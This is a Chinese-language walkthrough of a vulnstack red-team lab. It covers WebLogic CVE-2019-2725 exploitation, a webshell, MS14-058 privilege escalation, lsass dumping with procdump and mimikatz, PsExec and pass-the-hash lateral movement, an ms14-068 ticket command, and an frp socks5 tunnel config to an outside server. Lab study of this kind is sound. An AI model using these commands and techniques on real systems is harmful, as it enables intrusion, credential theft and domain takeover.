下載地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
環境配置:
web靶機需要恢復到快照3,然后登陸時切換用戶為:WEB\de1ay 密碼:1qaz@WSX,這樣后續還有提權步驟,進入目錄C:\Oracle\Middleware\user_projects\domains\base_domain,運行startweblogic服務
然后我將虛擬機nat網段設定成了和web靶機一樣的192.168.111.0/24,然后讓web靶機改為自動獲取ip,就可以出網了
配置資訊:
DC
IP:10.10.10.10 OS:Windows 2012(64)
應用:AD域
WEB
IP1:10.10.10.80 IP2:192.168.111.4 OS:Windows 2008(64)
應用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201 IP2:192.168.111.5 OS:Windows 7(32)
1.web外網打點
直接pingweb主機發現ping不同,可能是防火墻的問題,nmap用SYN做全埠掃描nmap -sS -Pn -p1-65535 192.168.111.4 Pn為不發送icmp包

逐一嘗試每個埠,最后在7001埠發現有內容,掃描一下路徑

看一下login這個路徑,發現是WebLogic Server 版本: 10.3.6.0

直接搜索一下該版本漏洞,發現存在CVE-2019-2725,本來想直接msf用這個CVE去打,但是發現有360

然后在網上找了個可以利用這個CVE的工具,下載地址:https://github.com/shack2/javaserializetools

然后上傳了個冰蝎自帶的jsp木馬

然后冰蝎成功上線

然后CS設定好監聽后直接彈給CS,但是360又給干碎了

這里試了很久,要么就是被360攔截,要么就是無法聯動,tnnd,直接物理黑客把360關了(主要是我的虛擬機出忘了,360自動更新了,太菜了shellcode免殺技術不過關)
然后派生給cs,cs成功上線

提權直接使用MS14-058提權,我通過msf直接提不成功,用的以下工具:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-058

發現可以提權后,用cs生成一段powershell上線腳本,然后運行Win64.exe "powershell腳本內容",這樣就可以上線cs啦


上線后再派生到msf方便結合進行內網資訊收集,這里也可以再多進行下權限維護

2.內網資訊收集
CS獲取憑據資訊

msf查看下域控、域成員等

msf自動建立并查看路由

利用web靶機作為跳板,用msf對內網實時掃描探測,發現了內網主機ip(前面已經知道了10.10.10.10是域控,接下來對域控進行探測)

使用nmap掛上代理對其進行掃描(有點慢)

或者直接使用cs來掃描也是一樣的portscan 10.10.10.0/24,內網存活主機探測加埠掃描

掃描結果就是都開啟了445和3389
3.域橫向
先用永恒之藍試試域控呢過不能拿下,msf掃描一下看是否存在漏洞,結果顯示存在

但是問題是一直沒有會話回傳,沒辦法換條路走,用psexec.exe來實作域橫向,這里因為是win server 2008的緣故,正好是可以直接抓到明文密碼的,直接拿抓到的明文密碼試一試(后面都沒圖了,忘了截)
上傳psexec.exe到web靶機,然后因為DC靶機開啟了139,445埠,嘗試在web靶機上IPC$連一下DC,發現可以連接成功
這時使用psexec獲取到DC的system權限就好了
PsExec.exe -accepteula \\DC -s cmd.exe
接下來就需要讓DC上線CS,方便后續操作,通過web靶機在cs設定一個中轉監聽,然后生成該監聽器的payload
將payload上傳到web靶機,在通過IPC$共享復制到DC靶機上
system權限運行,CS成功上線DC域控靶機,然后我可以用打域控同樣的方式拿下PC靶機
3.其他方式的內網滲透
因為上面的內網滲透方式是直接打的,有許多不足,后面復盤的時候有嘗試勒幾種不同的方式,不過因為沒截圖,所以接來下就都用文字說明了~
殺軟的問題
上面我是直接手動把殺軟關了,后面發現除了做免殺還是有辦法的(主要做了好久發現還是過不了360,太菜了)
獲取webshell后上傳MS14-058.exe的提權工具(我做了簡單的免殺后這個沒有被360殺掉,msf的shellcode是怎么都被殺),然后上傳procdump.exe,用該提權工具以system權限運行procdump.exe -accepteula -ma lsass.exe lsass.dmp匯出lsass資訊,然后下載到本地,用mimikatz離線獲取到管理員明文密碼(其實這么簡單的密碼NTLM Hash爆破也出來了)
有了明文密碼之后,因為第一次掃描就發現開了3389,直接3389登錄管理員身份遠程桌面,手動關掉殺軟就行,PC靶機也可使用此方式,不過要先搭建socks代理用web靶機將流量轉發出來才可以連接到PC的RDP
ps:這里我后續還測驗了msf的killav以及強制taskkill /PID /F等,都是關不掉的,只能手動點擊關閉,或者師傅們有別的辦法可以傳授我~
域橫向的其他方法
之前我是直接用psexec.exe通過明文密碼的方式橫向移動的,但是psexec這個工具并不好,會產生大量日志
這里我們用wmic.py工具先進行PTH攻擊,然后用ipc$的方式連接域控,上傳shellcode(因為域控沒有殺軟),或者是
或者我們可以用PTT的方式,利用ms14-068漏洞,執行下面命令獲得可以訪問域控的票據,再把票據注入記憶體
ms14-068.exe -u 域成員名@域名 -s 域成員sid -d 域控制器地址 -p 域成員密碼
ps:這里順便想說一下我在域內比如要用impacket包里的python腳本工具怎么辦,比如wmic.py,因為想web靶機沒有Python環境,只能將流量代理出來,cs的socks4a速度慢得很,msf的socks代理我感覺總是有有問題,所以還是自己上傳frp或ew這種手動建立socks5要快一些
我一般使用frp,frp建立socks5代理只需要修改frpc.ini即可(新get到的,之前都是用ew)
frpc.ini配置:
[common]
server_addr = 服務器IP
server_port = 7778
[sock5]
type = tcp
remote_port =8111
plugin = socks5
It is never too late to learn
個人博客:yiaho.cn
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/502124.html
標籤:其他
